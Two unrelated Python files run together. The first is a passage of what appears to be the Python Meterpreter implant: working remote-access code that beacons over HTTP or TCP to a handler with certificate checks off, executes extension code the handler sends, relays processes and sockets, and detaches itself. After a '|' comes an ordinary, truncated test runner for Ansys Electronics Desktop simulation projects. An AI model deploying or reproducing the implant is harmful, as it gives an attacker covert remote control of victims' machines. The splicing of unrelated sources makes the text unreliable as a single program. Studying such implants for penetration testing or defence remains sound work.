result = struct.pack('BBBB', *xor_key) + xor_bytes(xor_key, raw)
return result
def send_packet(self, pkt):
pkt = struct.pack('>I', len(pkt) + 4) + pkt
self.request_retire = False
try:
self._send_packet(self.encrypt_packet(pkt))
except:
debug_traceback()
return False
self.communication_last = time.time()
return True
def tlv_pack_timeouts(self):
response = tlv_pack(TLV_TYPE_TRANS_COMM_TIMEOUT, self.communication_timeout)
response += tlv_pack(TLV_TYPE_TRANS_RETRY_TOTAL, self.retry_total)
response += tlv_pack(TLV_TYPE_TRANS_RETRY_WAIT, self.retry_wait)
return response
def tlv_pack_transport_group(self):
trans_group = tlv_pack(TLV_TYPE_TRANS_URL, self.url)
trans_group += self.tlv_pack_timeouts()
return trans_group
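# HTTP(S) transport: polls the handler URL for queued packets and POSTs responses back.
# Empty polls back off gradually (see _get_packet) to reduce traffic while the handler is idle.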
class HttpTransport(Transport):
def __init__(self, url, proxy=None, user_agent=None, http_host=None, http_referer=None, http_cookie=None):
super(HttpTransport, self).__init__()
opener_args = []
scheme = url.split(':', 1)[0]
if scheme == 'https' and ((sys.version_info[0] == 2 and sys.version_info >= (2, 7, 9)) or sys.version_info >= (3, 4, 3)):
import ssl
ssl_ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ssl_ctx.check_hostname = False
ssl_ctx.verify_mode = ssl.CERT_NONE
opener_args.append(urllib.HTTPSHandler(0, ssl_ctx))
if proxy:
opener_args.append(urllib.ProxyHandler({scheme: proxy}))
opener_args.append(urllib.ProxyBasicAuthHandler())
self.proxy = proxy
opener = urllib.build_opener(*opener_args)
opener.addheaders = []
if user_agent:
opener.addheaders.append(('User-Agent', user_agent))
if http_cookie:
opener.addheaders.append(('Cookie', http_cookie))
if http_referer:
opener.addheaders.append(('Referer', http_referer))
self.user_agent = user_agent
urllib.install_opener(opener)
self.url = url
self._http_request_headers = {'Content-Type': 'application/octet-stream'}
if http_host:
self._http_request_headers['Host'] = http_host
self._first_packet = None
self._empty_cnt = 0
def _activate(self):
self._first_packet = None
packet = self._get_packet()
if packet is None:
return False
self._first_packet = packet
return True
def _get_packet(self):
if self._first_packet:
packet = self._first_packet
self._first_packet = None
return packet
packet = None
xor_key = None
request = urllib.Request(self.url, None, self._http_request_headers)
urlopen_kwargs = {}
if sys.version_info > (2, 6):
urlopen_kwargs['timeout'] = self.communication_timeout
try:
url_h = urllib.urlopen(request, **urlopen_kwargs)
packet = url_h.read()
for _ in range(1):
                if len(packet) == 0:
break
if len(packet) < PACKET_HEADER_SIZE:
packet = None # looks corrupt
break
xor_key = struct.unpack('BBBB', packet[:PACKET_XOR_KEY_SIZE])
header = xor_bytes(xor_key, packet[:PACKET_HEADER_SIZE])
pkt_length = struct.unpack('>I', header[PACKET_LENGTH_OFF:PACKET_LENGTH_OFF+PACKET_LENGTH_SIZE])[0] - 8
if len(packet) != (pkt_length + PACKET_HEADER_SIZE):
packet = None # looks corrupt
except:
debug_traceback('Failure to receive packet from ' + self.url)
if not packet:
delay = 10 * self._empty_cnt
            if self._empty_cnt >= 10:
delay *= 10
self._empty_cnt += 1
time.sleep(float(min(10000, delay)) / 1000)
return packet
self._empty_cnt = 0
return packet
def _send_packet(self, packet):
request = urllib.Request(self.url, packet, self._http_request_headers)
urlopen_kwargs = {}
if sys.version_info > (2, 6):
urlopen_kwargs['timeout'] = self.communication_timeout
url_h = urllib.urlopen(request, **urlopen_kwargs)
response = url_h.read()
def patch_uri_path(self, new_path):
match = re.match(r'https?://[^/]+(/.*$)', self.url)
if match is None:
return False
self.url = self.url[:match.span(1)[0]] + new_path
return True
def tlv_pack_transport_group(self):
trans_group = super(HttpTransport, self).tlv_pack_transport_group()
if self.user_agent:
trans_group += tlv_pack(TLV_TYPE_TRANS_UA, self.user_agent)
if self.proxy:
trans_group += tlv_pack(TLV_TYPE_TRANS_PROXY_HOST, self.proxy)
return trans_group
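# TCP transport: for a bind address ('', '0.0.0.0' or '::') it listens and waits for the
# handler to connect, otherwise it connects out to host:port, then exchanges length-prefixed,
# XOR-obfuscated packets over the socket.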
class TcpTransport(Transport):
def __init__(self, url, socket=None):
super(TcpTransport, self).__init__()
self.url = url
self.socket = socket
self._cleanup_thread = None
self._first_packet = True
def _sock_cleanup(self, sock):
remaining_time = self.communication_timeout
while remaining_time > 0:
iter_start_time = time.time()
if select.select([sock], [], [], remaining_time)[0]:
if len(sock.recv(4096)) == 0:
break
remaining_time -= time.time() - iter_start_time
sock.close()
def _activate(self):
address, port = self.url[6:].rsplit(':', 1)
port = int(port.rstrip('/'))
timeout = max(self.communication_timeout, 30)
if address in ('', '0.0.0.0', '::'):
try:
server_sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
server_sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 0)
except (AttributeError, socket.error):
server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_sock.bind(('', port))
server_sock.listen(1)
if not select.select([server_sock], [], [], timeout)[0]:
server_sock.close()
return False
sock, _ = server_sock.accept()
server_sock.close()
else:
if ':' in address:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeout)
sock.connect((address, port))
sock.settimeout(None)
self.socket = sock
self._first_packet = True
return True
def _deactivate(self):
cleanup = threading.Thread(target=self._sock_cleanup, args=(self.socket,))
        cleanup.start()  # drain and close the old socket in the background
self.socket = None
def _get_packet(self):
first = self._first_packet
self._first_packet = False
if not select.select([self.socket], [], [], 0.5)[0]:
return bytes()
packet = self.socket.recv(PACKET_HEADER_SIZE)
        if len(packet) == 0:  # remote is closed
self.request_retire = True
return None
if len(packet) != PACKET_HEADER_SIZE:
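            # On a freshly staged connection the first 4 bytes are most likely the stage
            # length; drain that many bytes (the stage already executed) and poll again.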
if first and len(packet) == 4:
received = 0
header = packet[:4]
pkt_length = struct.unpack('>I', header)[0]
self.socket.settimeout(max(self.communication_timeout, 30))
while received < pkt_length:
received += len(self.socket.recv(pkt_length - received))
self.socket.settimeout(None)
return self._get_packet()
return None
xor_key = struct.unpack('BBBB', packet[:PACKET_XOR_KEY_SIZE])
# XOR the whole header first
header = xor_bytes(xor_key, packet[:PACKET_HEADER_SIZE])
# Extract just the length
pkt_length = struct.unpack('>I', header[PACKET_LENGTH_OFF:PACKET_LENGTH_OFF+PACKET_LENGTH_SIZE])[0]
pkt_length -= 8
# Read the rest of the packet
rest = bytes()
while len(rest) < pkt_length:
rest += self.socket.recv(pkt_length - len(rest))
# return the whole packet, as it's decoded separately
return packet + rest
def _send_packet(self, packet):
self.socket.send(packet)
@classmethod
def from_socket(cls, sock):
url = 'tcp://'
address, port = sock.getsockname()[:2]
# this will need to be changed if the bind stager ever supports binding to a specific address
if not address in ('', '0.0.0.0', '::'):
address, port = sock.getpeername()[:2]
url += address + ':' + str(port)
return cls(url, sock)
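# Core dispatcher: owns the transport list, open channels and registered command handlers.
# run() polls the active transport for TLV requests, dispatches them to the _core_* /
# extension handlers and forwards pending channel data back to MSF.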
class PythonMeterpreter(object):
def __init__(self, transport):
self.transport = transport
self._transport_sleep = None
self.running = False
self.last_registered_extension = None
self.extension_functions = {}
self.channels = {}
self.next_channel_id = 1
self.interact_channels = []
self.processes = {}
self.next_process_id = 1
self.transports = [self.transport]
self.session_expiry_time = SESSION_EXPIRATION_TIMEOUT
self.session_expiry_end = time.time() + self.session_expiry_time
for func in list(filter(lambda x: x.startswith('_core'), dir(self))):
self.extension_functions[func[1:]] = getattr(self, func)
self.running = True
def register_extension(self, extension_name):
self.last_registered_extension = extension_name
return self.last_registered_extension
def register_function(self, func):
self.extension_functions[func.__name__] = func
return func
def register_function_if(self, condition):
if condition:
return self.register_function
else:
return lambda function: function
def register_function_windll(self, func):
if has_windll:
self.register_function(func)
return func
def add_channel(self, channel):
if not isinstance(channel, MeterpreterChannel):
debug_print('[-] channel object is not an instance of MeterpreterChannel')
raise TypeError('invalid channel object')
idx = self.next_channel_id
self.channels[idx] = channel
debug_print('[*] added channel id: ' + str(idx) + ' type: ' + channel.__class__.__name__)
self.next_channel_id += 1
return idx
def add_process(self, process):
idx = self.next_process_id
self.processes[idx] = process
debug_print('[*] added process id: ' + str(idx))
self.next_process_id += 1
return idx
def get_packet(self):
pkt = self.transport.get_packet()
if pkt is None and self.transport.should_retire:
self.transport_change()
return pkt
def send_packet(self, packet):
send_succeeded = self.transport.send_packet(packet)
if not send_succeeded and self.transport.should_retire:
self.transport_change()
return send_succeeded
@property
def session_has_expired(self):
if self.session_expiry_time == 0:
return False
return time.time() > self.session_expiry_end
def transport_add(self, new_transport):
new_position = self.transports.index(self.transport)
self.transports.insert(new_position, new_transport)
def transport_change(self, new_transport=None):
if new_transport is None:
new_transport = self.transport_next()
self.transport.deactivate()
debug_print('[*] changing transport to: ' + new_transport.url)
while not new_transport.activate():
new_transport = self.transport_next(new_transport)
debug_print('[*] changing transport to: ' + new_transport.url)
self.transport = new_transport
def transport_next(self, current_transport=None):
if current_transport is None:
current_transport = self.transport
new_idx = self.transports.index(current_transport) + 1
if new_idx == len(self.transports):
new_idx = 0
return self.transports[new_idx]
def transport_prev(self, current_transport=None):
if current_transport is None:
current_transport = self.transport
new_idx = self.transports.index(current_transport) - 1
if new_idx == -1:
new_idx = len(self.transports) - 1
return self.transports[new_idx]
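    # Main loop: fetch and dispatch one request, honour any pending transport sleep, then
    # service interactive process channels, TCP/UDP client channels and TCP server channels.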
def run(self):
while self.running and not self.session_has_expired:
request = self.get_packet()
if request:
response = self.create_response(request)
if response:
self.send_packet(response)
if self._transport_sleep:
self.transport.deactivate()
time.sleep(self._transport_sleep)
self._transport_sleep = None
if not self.transport.activate():
self.transport_change()
continue
# iterate over the keys because self.channels could be modified if one is closed
channel_ids = list(self.channels.keys())
for channel_id in channel_ids:
channel = self.channels[channel_id]
data = bytes()
write_request_parts = []
if isinstance(channel, MeterpreterProcess):
if not channel_id in self.interact_channels:
continue
proc_h = channel.proc_h
if proc_h.stderr_reader.is_read_ready():
data = proc_h.stderr_reader.read()
elif proc_h.stdout_reader.is_read_ready():
data = proc_h.stdout_reader.read()
elif not channel.is_alive():
self.handle_dead_resource_channel(channel_id)
elif isinstance(channel, MeterpreterSocketTCPClient):
while select.select([channel.fileno()], [], [], 0)[0]:
try:
d = channel.read(1)
except socket.error:
d = bytes()
if len(d) == 0:
self.handle_dead_resource_channel(channel_id)
break
data += d
elif isinstance(channel, MeterpreterSocketTCPServer):
if select.select([channel.fileno()], [], [], 0)[0]:
(client_sock, client_addr) = channel.sock.accept()
server_addr = channel.sock.getsockname()
client_channel_id = self.add_channel(MeterpreterSocketTCPClient(client_sock))
self.send_packet(tlv_pack_request('stdapi_net_tcp_channel_open', [
{'type': TLV_TYPE_CHANNEL_ID, 'value': client_channel_id},
{'type': TLV_TYPE_CHANNEL_PARENTID, 'value': channel_id},
{'type': TLV_TYPE_LOCAL_HOST, 'value': inet_pton(channel.sock.family, server_addr[0])},
{'type': TLV_TYPE_LOCAL_PORT, 'value': server_addr[1]},
{'type': TLV_TYPE_PEER_HOST, 'value': inet_pton(client_sock.family, client_addr[0])},
{'type': TLV_TYPE_PEER_PORT, 'value': client_addr[1]},
]))
elif isinstance(channel, MeterpreterSocketUDPClient):
if select.select([channel.fileno()], [], [], 0)[0]:
try:
data, peer_address = channel.sock.recvfrom(65535)
except socket.error:
self.handle_dead_resource_channel(channel_id)
else:
write_request_parts.extend([
{'type': TLV_TYPE_PEER_HOST, 'value': peer_address[0]},
{'type': TLV_TYPE_PEER_PORT, 'value': peer_address[1]},
])
if data:
write_request_parts.extend([
{'type': TLV_TYPE_CHANNEL_ID, 'value': channel_id},
{'type': TLV_TYPE_CHANNEL_DATA, 'value': data},
{'type': TLV_TYPE_LENGTH, 'value': len(data)},
])
self.send_packet(tlv_pack_request('core_channel_write', write_request_parts))
def handle_dead_resource_channel(self, channel_id):
del self.channels[channel_id]
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
self.send_packet(tlv_pack_request('core_channel_close', [
{'type': TLV_TYPE_CHANNEL_ID, 'value': channel_id},
]))
def _core_set_uuid(self, request, response):
new_uuid = packet_get_tlv(request, TLV_TYPE_UUID)
if new_uuid:
            global PAYLOAD_UUID
            # decode so PAYLOAD_UUID stays a str (it is later re-encoded with bytes(..., 'UTF-8'))
            PAYLOAD_UUID = binascii.b2a_hex(new_uuid['value']).decode('UTF-8')
return ERROR_SUCCESS, response
def _core_enumextcmd(self, request, response):
id_start = packet_get_tlv(request, TLV_TYPE_UINT)['value']
id_end = packet_get_tlv(request, TLV_TYPE_LENGTH)['value'] + id_start
for func_name in self.extension_functions.keys():
command_id = cmd_string_to_id(func_name)
if command_id is None:
continue
if id_start < command_id and command_id < id_end:
response += tlv_pack(TLV_TYPE_UINT, command_id)
return ERROR_SUCCESS, response
def _core_get_session_guid(self, request, response):
response += tlv_pack(TLV_TYPE_SESSION_GUID, binascii.a2b_hex(bytes(SESSION_GUID, 'UTF-8')))
return ERROR_SUCCESS, response
def _core_set_session_guid(self, request, response):
new_guid = packet_get_tlv(request, TLV_TYPE_SESSION_GUID)
if new_guid:
            global SESSION_GUID
            # decode so SESSION_GUID stays a str (it is later re-encoded with bytes(..., 'UTF-8'))
            SESSION_GUID = binascii.b2a_hex(new_guid['value']).decode('UTF-8')
return ERROR_SUCCESS, response
def _core_machine_id(self, request, response):
serial = ''
machine_name = platform.uname()[1]
if has_windll:
from ctypes import wintypes
k32 = ctypes.windll.kernel32
sys_dir = ctypes.create_unicode_buffer(260)
if not k32.GetSystemDirectoryW(ctypes.byref(sys_dir), 260):
return ERROR_FAILURE_WINDOWS
vol_buf = ctypes.create_unicode_buffer(260)
fs_buf = ctypes.create_unicode_buffer(260)
serial_num = wintypes.DWORD(0)
if not k32.GetVolumeInformationW(ctypes.c_wchar_p(sys_dir.value[:3]),
vol_buf, ctypes.sizeof(vol_buf), ctypes.byref(serial_num), None,
None, fs_buf, ctypes.sizeof(fs_buf)):
return ERROR_FAILURE_WINDOWS
serial_num = serial_num.value
serial = "%04x" % ((serial_num >> 16) & 0xffff) + '-' "%04x" % (serial_num & 0xffff)
else:
serial = get_hdd_label()
response += tlv_pack(TLV_TYPE_MACHINE_ID, "%s:%s" % (serial, machine_name))
return ERROR_SUCCESS, response
def _core_native_arch(self, request, response):
response += tlv_pack(TLV_TYPE_STRING, get_native_arch())
return ERROR_SUCCESS, response
def _core_patch_url(self, request, response):
if not isinstance(self.transport, HttpTransport):
return ERROR_FAILURE, response
new_uri_path = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
if not self.transport.patch_uri_path(new_uri_path):
return ERROR_FAILURE, response
return ERROR_SUCCESS, response
def _core_negotiate_tlv_encryption(self, request, response):
debug_print('[*] Negotiating TLV encryption')
self.transport.aes_key = rand_bytes(32)
self.transport.aes_enabled = False
response += tlv_pack(TLV_TYPE_SYM_KEY_TYPE, ENC_AES256)
der = packet_get_tlv(request, TLV_TYPE_RSA_PUB_KEY)['value'].strip()
debug_print('[*] RSA key: ' + str(binascii.b2a_hex(der)))
debug_print('[*] AES key: ' + hex(met_rsa.b2i(self.transport.aes_key)))
enc_key = met_rsa_encrypt(der, self.transport.aes_key)
debug_print('[*] Encrypted AES key: ' + hex(met_rsa.b2i(enc_key)))
response += tlv_pack(TLV_TYPE_ENC_SYM_KEY, enc_key)
debug_print('[*] TLV encryption sorted')
return ERROR_SUCCESS, response
def _core_loadlib(self, request, response):
data_tlv = packet_get_tlv(request, TLV_TYPE_DATA)
if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
return ERROR_FAILURE, response
libname = '???'
match = re.search(r'^meterpreter\.register_extension\(\'([a-zA-Z0-9]+)\'\)$', str(data_tlv['value']), re.MULTILINE)
if match is not None:
libname = match.group(1)
self.last_registered_extension = None
symbols_for_extensions = {'meterpreter': self}
symbols_for_extensions.update(EXPORTED_SYMBOLS)
i = code.InteractiveInterpreter(symbols_for_extensions)
i.runcode(compile(data_tlv['value'], 'ext_server_' + libname + '.py', 'exec'))
extension_name = self.last_registered_extension
if extension_name:
check_extension = lambda x: x.startswith(extension_name)
lib_methods = list(filter(check_extension, list(self.extension_functions.keys())))
for method in lib_methods:
response += tlv_pack(TLV_TYPE_UINT, cmd_string_to_id(method))
return ERROR_SUCCESS, response
def _core_shutdown(self, request, response):
response += tlv_pack(TLV_TYPE_BOOL, True)
self.running = False
return ERROR_SUCCESS, response
def _core_transport_add(self, request, response):
new_transport = Transport.from_request(request)
self.transport_add(new_transport)
return ERROR_SUCCESS, response
def _core_transport_change(self, request, response):
new_transport = Transport.from_request(request)
self.transport_add(new_transport)
self.send_packet(response + tlv_pack(TLV_TYPE_RESULT, ERROR_SUCCESS))
self.transport_change(new_transport)
return None
def _core_transport_list(self, request, response):
if self.session_expiry_time > 0:
response += tlv_pack(TLV_TYPE_TRANS_SESSION_EXP, self.session_expiry_end - time.time())
response += tlv_pack(TLV_TYPE_TRANS_GROUP, self.transport.tlv_pack_transport_group())
transport = self.transport_next()
while transport != self.transport:
response += tlv_pack(TLV_TYPE_TRANS_GROUP, transport.tlv_pack_transport_group())
transport = self.transport_next(transport)
return ERROR_SUCCESS, response
def _core_transport_next(self, request, response):
new_transport = self.transport_next()
if new_transport == self.transport:
return ERROR_FAILURE, response
self.send_packet(response + tlv_pack(TLV_TYPE_RESULT, ERROR_SUCCESS))
self.transport_change(new_transport)
return None
def _core_transport_prev(self, request, response):
new_transport = self.transport_prev()
if new_transport == self.transport:
return ERROR_FAILURE, response
self.send_packet(response + tlv_pack(TLV_TYPE_RESULT, ERROR_SUCCESS))
self.transport_change(new_transport)
return None
def _core_transport_remove(self, request, response):
url = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
if self.transport.url == url:
return ERROR_FAILURE, response
transport_found = False
for transport in self.transports:
if transport.url == url:
transport_found = True
break
if transport_found:
self.transports.remove(transport)
return ERROR_SUCCESS, response
return ERROR_FAILURE, response
def _core_transport_set_timeouts(self, request, response):
timeout_value = packet_get_tlv(request, TLV_TYPE_TRANS_SESSION_EXP).get('value')
if not timeout_value is None:
self.session_expiry_time = timeout_value
self.session_expiry_end = time.time() + self.session_expiry_time
timeout_value = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT).get('value')
if timeout_value:
self.transport.communication_timeout = timeout_value
retry_value = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_TOTAL).get('value')
if retry_value:
self.transport.retry_total = retry_value
retry_value = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_WAIT).get('value')
if retry_value:
self.transport.retry_wait = retry_value
if self.session_expiry_time > 0:
response += tlv_pack(TLV_TYPE_TRANS_SESSION_EXP, self.session_expiry_end - time.time())
response += self.transport.tlv_pack_timeouts()
return ERROR_SUCCESS, response
def _core_transport_sleep(self, request, response):
seconds = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT)['value']
self.send_packet(response + tlv_pack(TLV_TYPE_RESULT, ERROR_SUCCESS))
if seconds:
self._transport_sleep = seconds
        return None
def _core_channel_open(self, request, response):
channel_type = packet_get_tlv(request, TLV_TYPE_CHANNEL_TYPE)
handler = 'channel_open_' + channel_type['value']
if handler not in self.extension_functions:
debug_print('[-] core_channel_open missing handler: ' + handler)
return error_result(NotImplementedError), response
debug_print('[*] core_channel_open dispatching to handler: ' + handler)
handler = self.extension_functions[handler]
return handler(request, response)
def _core_channel_close(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
status, response = channel.core_close(request, response)
if status == ERROR_SUCCESS:
del self.channels[channel_id]
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
debug_print('[*] closed and removed channel id: ' + str(channel_id))
return status, response
def _core_channel_eof(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
status, response = channel.core_eof(request, response)
        return status, response
def _core_channel_interact(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
toggle = packet_get_tlv(request, TLV_TYPE_BOOL)['value']
if toggle:
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
else:
self.interact_channels.append(channel_id)
elif channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
return ERROR_SUCCESS, response
def _core_channel_read(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
status, response = channel.core_read(request, response)
if not channel.is_alive():
self.handle_dead_resource_channel(channel_id)
return status, response
def _core_channel_write(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
status = ERROR_FAILURE
if channel.is_alive():
status, response = channel.core_write(request, response)
# evaluate channel.is_alive() twice because it could have changed
if not channel.is_alive():
self.handle_dead_resource_channel(channel_id)
return status, response
def create_response(self, request):
response = struct.pack('>I', PACKET_TYPE_RESPONSE)
commd_id_tlv = packet_get_tlv(request, TLV_TYPE_COMMAND_ID)
response += tlv_pack(commd_id_tlv)
response += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(bytes(PAYLOAD_UUID, 'UTF-8')))
handler_name = cmd_id_to_string(commd_id_tlv['value'])
if handler_name in self.extension_functions:
handler = self.extension_functions[handler_name]
try:
debug_print('[*] running method ' + handler_name)
result = handler(request, response)
if result is None:
debug_print("[-] handler result is none")
return
result, response = result
except Exception:
debug_traceback('[-] method ' + handler_name + ' resulted in an error')
result = error_result()
else:
if result != ERROR_SUCCESS:
debug_print('[-] method ' + handler_name + ' resulted in error: #' + str(result))
else:
debug_print('[-] method ' + handler_name + ' was requested but does not exist')
result = error_result(NotImplementedError)
reqid_tlv = packet_get_tlv(request, TLV_TYPE_REQUEST_ID)
if not reqid_tlv:
debug_print("[-] no request ID found")
return
response += tlv_pack(reqid_tlv)
debug_print("[*] sending response packet")
return response + tlv_pack(TLV_TYPE_RESULT, result)
# PATCH-SETUP-ENCRYPTION #
_try_to_fork = TRY_TO_FORK and hasattr(os, 'fork')
if not _try_to_fork or (_try_to_fork and os.fork() == 0):
if hasattr(os, 'setsid'):
try:
os.setsid()
except OSError:
pass
if HTTP_CONNECTION_URL and has_urllib:
transport = HttpTransport(HTTP_CONNECTION_URL, proxy=HTTP_PROXY, user_agent=HTTP_USER_AGENT,
http_host=HTTP_HOST, http_referer=HTTP_REFERER, http_cookie=HTTP_COOKIE)
else:
# PATCH-SETUP-STAGELESS-TCP-SOCKET #
transport = TcpTransport.from_socket(s)
met = PythonMeterpreter(transport)
# PATCH-SETUP-TRANSPORTS #
met.run()
|
aedt_test_runner.py
|
import argparse
import datetime
import json
import os
import platform
import re
import subprocess
import tempfile
import threading
from contextlib import contextmanager
from distutils.dir_util import copy_tree
from distutils.dir_util import mkpath
from distutils.dir_util import remove_tree
from distutils.file_util import copy_file
from pathlib import Path
from time import sleep
from typing import Any
from typing import Dict
from typing import Iterable
from typing import Iterator
from typing import List
from typing import Optional
from typing import Tuple
from typing import Union
from django import setup as django_setup
from django.conf import settings as django_settings
from django.template.loader import get_template
from aedttest.clusters.job_hosts import get_job_machines
from aedttest.logger import logger
from aedttest.logger import set_logger
from pyaedt import __file__ as _py_aedt_path # isort: skip
MODULE_DIR = Path(__file__).resolve().parent
CWD_DIR = Path.cwd()
# configure Django templates
django_settings.configure(
TEMPLATES=[
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [MODULE_DIR / "static" / "templates"], # if you want the templates from a file
},
]
)
django_setup()
MAIN_PAGE_TEMPLATE = get_template("main.html")
PROJECT_PAGE_TEMPLATE = get_template("project-report.html")
def main() -> None:
"""Main function that is executed by ``flit`` CLI script and by executing this python file."""
try:
cli_args = parse_arguments()
except ValueError as exc:
logger.error(str(exc))
raise SystemExit(1)
aedt_tester = ElectronicsDesktopTester(
version=cli_args.aedt_version,
max_cores=cli_args.max_cores,
max_tasks=cli_args.max_tasks,
config_file=cli_args.config_file,
out_dir=cli_args.out_dir,
save_projects=cli_args.save_sim_data,
only_reference=cli_args.only_reference,
reference_file=cli_args.reference_file,
)
try:
if not cli_args.suppress_validation:
aedt_tester.validate_config()
if cli_args.only_validate:
return
if len(aedt_tester.machines_dict) > 1 and not cli_args.rsm_is_started:
                if not cli_args.rsm_path or not os.path.isfile(cli_args.rsm_path):
                    raise ValueError("Path to the RSM service is not provided or does not exist")
                if platform.system() == "Windows":
                    raise ValueError("On Windows you must start the RSM service manually and set the --rsm-is-started flag")
for machine in aedt_tester.machines_dict:
out = subprocess.check_output(["ssh", machine, f"{cli_args.rsm_path} start"])
logger.debug(f"{machine}: {out.decode().strip()}")
try:
aedt_tester.run()
finally:
if len(aedt_tester.machines_dict) > 1 and not cli_args.rsm_is_started:
for machine in aedt_tester.machines_dict:
out = subprocess.check_output(["ssh", machine, f"{cli_args.rsm_path} stop"])
logger.debug(f"{machine}: {out.decode().strip()}")
except Exception as exc:
logger.exception(str(exc))
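# Orchestrates a full test run: validates the configuration, allocates machines and cores per
# project, launches Electronics Desktop for each project in its own thread and renders the
# HTML and JSON reports.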
class ElectronicsDesktopTester:
def __init__(
self,
version: str,
max_cores: int,
max_tasks: int,
config_file: Union[str, Path],
out_dir: Optional[str],
save_projects: Optional[bool],
only_reference: Optional[bool],
reference_file: Union[str, Path],
) -> None:
logger.info(f"Initialize new Electronics Desktop Test run. Configuration file is {config_file}")
self.version = version
self.max_cores = max_cores
self.max_tasks = max_tasks
self.active_tasks = 0
self.out_dir = Path(out_dir) if out_dir else CWD_DIR
self.results_path = self.out_dir / "results"
self.proj_dir = self.out_dir if save_projects else None
self.only_reference = only_reference
self.reference_data = {}
if not only_reference:
with open(reference_file) as file:
self.reference_data = json.load(file)
self.script = str(MODULE_DIR / "simulation_data.py")
self.script_args = f"--pyaedt-path={Path(_py_aedt_path).parent.parent}"
self.report_data: Dict[str, Any] = {}
self.machines_dict = {machine.hostname: machine.cores for machine in get_job_machines()}
with open(config_file) as file:
self.project_tests_config = json.load(file)
def validate_config(self) -> None:
"""Make quick validation of --config-file [and --reference-file if present].
Checks that distribution is specified correctly and that projects in
reference identical to configuration.
"""
for project_name, config in self.project_tests_config.items():
distribution_config = config["distribution"]
if "parametric_tasks" in distribution_config:
tasks = distribution_config["parametric_tasks"]
cores = distribution_config["cores"]
if not isinstance(tasks, int):
raise KeyError("'parametric_tasks' key must be integer")
if tasks < 1:
raise KeyError("'parametric_tasks' key must be >= 1")
if tasks > cores:
# implicitly checks that cores >= 1
raise KeyError("'parametric_tasks' key must be <= 'cores'")
if cores % tasks != 0:
raise KeyError("'cores' divided by 'parametric_tasks' must be integer")
if not self.only_reference:
if "projects" not in self.reference_data:
raise KeyError("'projects' key is not specified in Reference File")
not_found_in_conf = set(self.reference_data["projects"]) - set(self.project_tests_config)
if not_found_in_conf:
msg = (
f"Following projects defined in reference results: {', '.join(list(not_found_in_conf))}"
", but not specified in current configuration file"
)
raise KeyError(msg)
not_found_in_ref = set(self.project_tests_config) - set(self.reference_data["projects"])
if not_found_in_ref:
msg = (
f"Following projects defined in configuration file: {', '.join(list(not_found_in_ref))}"
", but not found in reference results file"
)
raise KeyError(msg)
logger.info("Configuration validation is successful")
def run(self) -> None:
"""Main function to start test suite."""
self.validate_hardware()
self.initialize_results()
threads_list = []
with mkdtemp_persistent(
persistent=(self.proj_dir is not None), dir=self.proj_dir, prefix=f"{self.version}_"
) as tmp_dir:
for project_name, allocated_machines in self.allocator():
project_config = self.project_tests_config[project_name]
logger.info(f"Start project {project_name}")
copy_dependencies(project_config, tmp_dir)
project_path = copy_proj(project_name, project_config, tmp_dir)
thread_kwargs = {
"project_path": project_path,
"allocated_machines": allocated_machines,
"project_config": project_config,
"project_name": project_name,
}
thread = threading.Thread(target=self.task_runner, daemon=True, kwargs=thread_kwargs)
thread.start()
threads_list.append(thread)
for th in threads_list:
# wait for all threads to finish before delete folder
th.join()
self.render_main_html(finished=True) # make thread-safe render
combined_report_path = self.create_combined_report()
msg = f"Job is completed.\nReference result file is stored under {combined_report_path}"
if not self.only_reference:
msg += f"\nYou can view report by opening in web browser: {self.results_path / 'main.html'}"
logger.info(msg)
def create_combined_report(self) -> Path:
"""Reads all .json files in ``reference_folder`` and dumps it to single file ``'reference_results.json'``.
Returns
-------
Path
Path to the combined .json file.
"""
combined_report_path = self.results_path / "reference_results.json"
combined_data: Dict[str, Any] = {"error_exception": [], "aedt_version": self.version, "projects": {}}
reference_folder = self.results_path / "reference_folder"
if not reference_folder.exists():
raise RuntimeError("Reference results were not generated. Probably projects failed to run")
for json_file in reference_folder.iterdir():
with open(json_file) as file:
single_data = json.load(file)
combined_data["projects"][json_file.stem] = single_data
with open(combined_report_path, "w") as file:
json.dump(combined_data, file, indent=4)
return combined_report_path
def validate_hardware(self) -> None:
"""Validate that we have enough hardware resources to run requested configuration."""
all_cores = [val for val in self.machines_dict.values()]
total_available_cores = sum(all_cores)
max_machine_cores = max(all_cores)
for proj in self.project_tests_config:
proj_cores = self.project_tests_config[proj]["distribution"]["cores"]
if proj_cores > total_available_cores or (
self.project_tests_config[proj]["distribution"].get("single_node", False)
and proj_cores > max_machine_cores
):
raise ValueError(f"{proj} requires {proj_cores} cores. Not enough resources to run")
def initialize_results(self) -> None:
